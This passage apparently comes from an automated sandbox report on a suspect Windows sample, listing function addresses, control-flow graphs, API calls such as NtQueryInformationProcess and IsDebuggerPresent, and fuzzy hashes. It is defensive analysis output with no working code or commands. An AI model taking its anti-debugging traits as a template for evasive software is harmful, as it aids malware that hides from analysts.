                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F443AC76A242558FCB18CF2CC990BEDB7F1FB4A300F108599E419DB760D6359E868F85
                                                                                                                                                                                                                                                Function 6D591360 Relevance: 50.6, APIs: 18, Strings: 10, Instructions: 1573memoryfileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseFileHandle$CreateModule$InformationMapping$NameProtectVirtual
                                                                                                                                                                                                                                                • String ID: (c1v$(c1v$.text$@$KuO4$KuO4$^;$aIh$b>AJ$b>AJ
                                                                                                                                                                                                                                                • API String ID: 4182465802-70789730
                                                                                                                                                                                                                                                • Opcode ID: 023209248dad6ea76e8c2da60bb847703d8de3e24018fd5a7032c198056dfbce
                                                                                                                                                                                                                                                • Instruction ID: db6b322addbd9b386a44f3aa6cb7699af51447e8ae088889cbccef5823e2c4b5
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 023209248dad6ea76e8c2da60bb847703d8de3e24018fd5a7032c198056dfbce
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9AD2ED39A14265CFDB19CF6CC994BDDBBF2BB46300F008999D859DF780D63999498F02
                                                                                                                                                                                                                                                Function 6D5936D0 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 313COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 711 6d5936d0-6d59371a 712 6d593721-6d59372c 711->712 713 6d593b21-6d593b2a 712->713 714 6d593732-6d59373f 712->714 715 6d593b31 713->715 717 6d5939d5-6d5939e5 714->717 718 6d593745-6d593752 714->718 715->712 717->715 720 6d593758-6d593765 718->720 721 6d5938a4-6d5938eb 718->721 723 6d59376b-6d593778 720->723 724 6d593a00-6d593a07 720->724 721->715 726 6d5939ea-6d5939fb 723->726 727 6d59377e-6d59378b 723->727 724->715 726->715 729 6d593791-6d59379e 727->729 730 6d5938f0-6d5938f7 727->730 732 6d5937a4-6d5937b1 729->732 733 6d593ae6-6d593af5 729->733 730->715 735 6d5938fc-6d59391d 732->735 736 6d5937b7-6d5937c4 732->736 733->715 735->715 738 6d593afa-6d593b14 call 6d597250 736->738 739 6d5937ca-6d5937d7 736->739 743 6d5937dd-6d5937ea 739->743 744 6d593a77-6d593ac9 739->744 746 6d593ace-6d593ad5 743->746 747 6d5937f0-6d5937fd 743->747 744->715 746->715 749 6d593a0c-6d593a72 747->749 750 6d593803-6d593810 747->750 749->715 752 6d593b15-6d593b1c 750->752 753 6d593816-6d593823 750->753 752->715 755 6d593829-6d593836 753->755 756 6d593ada-6d593ae1 753->756 758 6d59383c-6d593849 755->758 759 6d593922-6d5939d0 GetModuleHandleW call 6d592c30 call 6d597e70 NtQueryInformationProcess 755->759 756->715 763 6d593859-6d59389f 758->763 764 6d59384f-6d593854 758->764 759->715 763->715 764->715
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: ;o$NtQueryInformationProcess$ntdll.dll
                                                                                                                                                                                                                                                • API String ID: 0-3799071571
                                                                                                                                                                                                                                                • Opcode ID: 5bb6ff690809804ba98aef3f1d38d4696d5f0bd38118c7b239413375febd2387
                                                                                                                                                                                                                                                • Instruction ID: cbcf2412f8f0b1c461ac9a3d2ecafdef5e6a41ad520918772761535071f3a479
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5bb6ff690809804ba98aef3f1d38d4696d5f0bd38118c7b239413375febd2387
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67B1DAB5E05285CFEB08CFACD5953DDBBF2FB4A300F10891AE819EB754CA3999058B41
                                                                                                                                                                                                                                                Function 6D5973B8 Relevance: 10.6, APIs: 7, Instructions: 136COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6D5973FF
                                                                                                                                                                                                                                                • ___scrt_uninitialize_crt.LIBCMT ref: 6D597419
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize___scrt_uninitialize_crt
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2442719207-0
                                                                                                                                                                                                                                                • Opcode ID: 999f7a55ce85c4b5ce16656329a3c55faf9e0916baf853429cdf0cb0ffee5cff
                                                                                                                                                                                                                                                • Instruction ID: 90ceba22f58992c4d6c42fa20bb7a50af15039855aaac26750aa2194dbdc635b
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 999f7a55ce85c4b5ce16656329a3c55faf9e0916baf853429cdf0cb0ffee5cff
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9041D572E082DAABDB198F59CC40BBE7B75EB80B65F124417E9185FA40D7344E429BE0
                                                                                                                                                                                                                                                Function 6D597468 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 768 6d597468-6d597479 call 6d597c10 771 6d59747b-6d597481 768->771 772 6d59748a-6d597491 768->772 771->772 773 6d597483-6d597485 771->773 774 6d59749d-6d5974b1 dllmain_raw 772->774 775 6d597493-6d597496 772->775 776 6d597563-6d597572 773->776 778 6d59755a-6d597561 774->778 779 6d5974b7-6d5974c8 dllmain_crt_dispatch 774->779 775->774 777 6d597498-6d59749b 775->777 780 6d5974ce-6d5974e0 call 6d596c40 777->780 778->776 779->778 779->780 783 6d597509-6d59750b 780->783 784 6d5974e2-6d5974e4 780->784 786 6d59750d-6d597510 783->786 787 6d597512-6d597523 dllmain_crt_dispatch 783->787 784->783 785 6d5974e6-6d597504 call 6d596c40 call 6d5973b8 dllmain_raw 784->785 785->783 786->778 786->787 787->778 789 6d597525-6d597557 dllmain_raw 787->789 789->778
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3136044242-0
                                                                                                                                                                                                                                                • Opcode ID: 79a6758a8fef4b4ebd0b9903c8871e9c69cd229589c54acbe98c45d3182602dd
                                                                                                                                                                                                                                                • Instruction ID: ee44f1b538257e7961fa08219abb787bb6f7c1bf70f3ba14c7af1ac912dae624
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 79a6758a8fef4b4ebd0b9903c8871e9c69cd229589c54acbe98c45d3182602dd
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 82218371E0429AABCB699F55CC40A7F3F79EB80BA4F014917F9185FA14D3308D428BE0
                                                                                                                                                                                                                                                Function 6D5972B1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • __RTC_Initialize.LIBCMT ref: 6D5972FE
                                                                                                                                                                                                                                                  • Part of subcall function 6D59777B: InitializeSListHead.KERNEL32(6D661430,6D597308,6D5A9450,00000010,6D597299,?,?,?,6D5974C1,?,00000001,?,?,00000001,?,6D5A9498), ref: 6D597780
                                                                                                                                                                                                                                                • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D597368
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image
                                                                                                                                                                                                                                                • String ID: U|Ym
                                                                                                                                                                                                                                                • API String ID: 3231365870-3624290880
                                                                                                                                                                                                                                                • Opcode ID: 8ba30c6a634784afdb2becb6b81a578ba2431f32cfae7f98779c6b9c8b4753cf
                                                                                                                                                                                                                                                • Instruction ID: 4aca9c4f14c5ea02c02f3530479d44879fd73daea15606b9b68c2ae4d6674d3f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ba30c6a634784afdb2becb6b81a578ba2431f32cfae7f98779c6b9c8b4753cf
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5021C332D4C2D2DBDB1C5BB484017AD3B60DF962ADF22485BDA456FDC2DF364840C6A2
                                                                                                                                                                                                                                                Function 6D59D8FC Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 837 6d59d8fc-6d59d901 838 6d59d903-6d59d91b 837->838 839 6d59d929-6d59d932 838->839 840 6d59d91d-6d59d921 838->840 842 6d59d944 839->842 843 6d59d934-6d59d937 839->843 840->839 841 6d59d923-6d59d927 840->841 844 6d59d99e-6d59d9a2 841->844 847 6d59d946-6d59d953 GetStdHandle 842->847 845 6d59d939-6d59d93e 843->845 846 6d59d940-6d59d942 843->846 844->838 848 6d59d9a8-6d59d9ab 844->848 845->847 846->847 849 6d59d980-6d59d992 847->849 850 6d59d955-6d59d957 847->850 849->844 851 6d59d994-6d59d997 849->851 850->849 852 6d59d959-6d59d962 GetFileType 850->852 851->844 852->849 853 6d59d964-6d59d96d 852->853 854 6d59d96f-6d59d973 853->854 855 6d59d975-6d59d978 853->855 854->844 855->844 856 6d59d97a-6d59d97e 855->856 856->844
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F6), ref: 6D59D948
                                                                                                                                                                                                                                                • GetFileType.KERNELBASE(00000000), ref: 6D59D95A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileHandleType
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3000768030-0
                                                                                                                                                                                                                                                • Opcode ID: 425f3f4431974581abd6b073198b7d5dcb4862e0fe56a38190ae611142047a95
                                                                                                                                                                                                                                                • Instruction ID: a7afc1fe02a4bbb94a63ab1c26f2b99b075ac6feb948ecccca8971963d8aeff9
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 425f3f4431974581abd6b073198b7d5dcb4862e0fe56a38190ae611142047a95
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E91181716047D24ADB389E3E8884736BAA5ABD7270B341F1FD1BA8ADE1C734D485C641
                                                                                                                                                                                                                                                Function 00FC4D78 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 857 fc4d78-fc5e6a 860 fc5e6c-fc5e6f 857->860 861 fc5e72-fc5e9d LoadLibraryW 857->861 860->861 862 fc5e9f-fc5ea5 861->862 863 fc5ea6-fc5ec3 861->863 862->863
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00FC5E90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1565578576.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_fc0000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 61117388226d7ca35a67c550991470d20ed7096666bfda5a172fecd743e97122
                                                                                                                                                                                                                                                • Instruction ID: 3ef0ebc18eab4fdb9b1b5b04861507d66168f43176e137486be82cd2efce9cdc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61117388226d7ca35a67c550991470d20ed7096666bfda5a172fecd743e97122
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B2147B1C0061A9BCB10CF9AC945BDEFBF4FB48720F10816AE818B7240D374AA40CFA5
                                                                                                                                                                                                                                                Function 00FC5E1F Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 866 fc5e1f-fc5e6a 868 fc5e6c-fc5e6f 866->868 869 fc5e72-fc5e9d LoadLibraryW 866->869 868->869 870 fc5e9f-fc5ea5 869->870 871 fc5ea6-fc5ec3 869->871 870->871
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 00FC5E90
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1565578576.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_fc0000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 7890ad71d7ec0dcdc172ea72531cd053d87d2f91ecbe4b8ad4aec589fc869789
                                                                                                                                                                                                                                                • Instruction ID: 5d293283f5ac56f106fe4ae35aed4a1eb1d0d09a06741b4089493f270cd8c7bb
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7890ad71d7ec0dcdc172ea72531cd053d87d2f91ecbe4b8ad4aec589fc869789
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 101129B1C006599FCB10CFAAD545BDEFBF4BB48720F10815AD419B7640C374AA44CFA5
                                                                                                                                                                                                                                                Function 00FC4D6C Relevance: 1.3, APIs: 1, Instructions: 52COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 934 fc4d6c-fc621c CloseHandle 937 fc621e-fc6224 934->937 938 fc6225-fc624d 934->938 937->938
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00FC620F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1565578576.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_fc0000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: f4994cf1f602807f3070c68ba897fae75d6fa81890bc252a556e712decd8aa49
                                                                                                                                                                                                                                                • Instruction ID: ab3d36b6d2b1b80f514482d5b0add04dbab367218ae24243b295232e6f0d5bbf
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f4994cf1f602807f3070c68ba897fae75d6fa81890bc252a556e712decd8aa49
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B51158B1804349CFDB10DF9AC445BEEBBF4EB48320F218469E528A7241D7B8A940CFA5
                                                                                                                                                                                                                                                Function 00FC61A8 Relevance: 1.3, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 941 fc61a8-fc621c CloseHandle 943 fc621e-fc6224 941->943 944 fc6225-fc624d 941->944 943->944
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • CloseHandle.KERNELBASE(00000000), ref: 00FC620F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1565578576.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_fc0000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                • Opcode ID: 82fddfcb35862751ebf5b777cc16a35ca8663e0fec90800ff0a52c25d4630642
                                                                                                                                                                                                                                                • Instruction ID: c4d2d1a2b26aa3051699b00abaf51c884af04c0506a989349714885272fc3742
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82fddfcb35862751ebf5b777cc16a35ca8663e0fec90800ff0a52c25d4630642
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 691155B1800249CFDB10CF99C445BEEBBF4AF48320F21846AD428A7281D7B8A940CFA5

                                                                                                                                                                                                                                                Non-executed Functions

                                                                                                                                                                                                                                                Function 6D597A9A Relevance: 6.1, APIs: 4, Instructions: 70COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6D597AA6
                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32 ref: 6D597B72
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D597B8B
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(?), ref: 6D597B95
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 254469556-0
                                                                                                                                                                                                                                                • Opcode ID: b08842796c50d3c5d30d5b10a36e3bde2b634863293012f5e9d23c662ca1b1a5
                                                                                                                                                                                                                                                • Instruction ID: 422c4ffa905f19b9c7cc32f641e21a8b173831bfcc27dfcc743d25349afff154
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b08842796c50d3c5d30d5b10a36e3bde2b634863293012f5e9d23c662ca1b1a5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5A31F6B5D05269DBDF10EFA4D849BCDBBB8BF08304F1141AAE50CAB640EB719E849F45
                                                                                                                                                                                                                                                Function 6D59BA57 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6D59BB4F
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6D59BB59
                                                                                                                                                                                                                                                • UnhandledExceptionFilter.KERNEL32(C00000EF,?,?,?,?,?,00000000), ref: 6D59BB66
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000006.00000002.1580323351.000000006D591000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D590000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580304027.000000006D590000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580395645.000000006D5A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5AB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D5F9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1580971766.000000006D637000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000006.00000002.1581713119.000000006D662000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_6d590000_uh3ex1.jbxd
                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                • String ID:
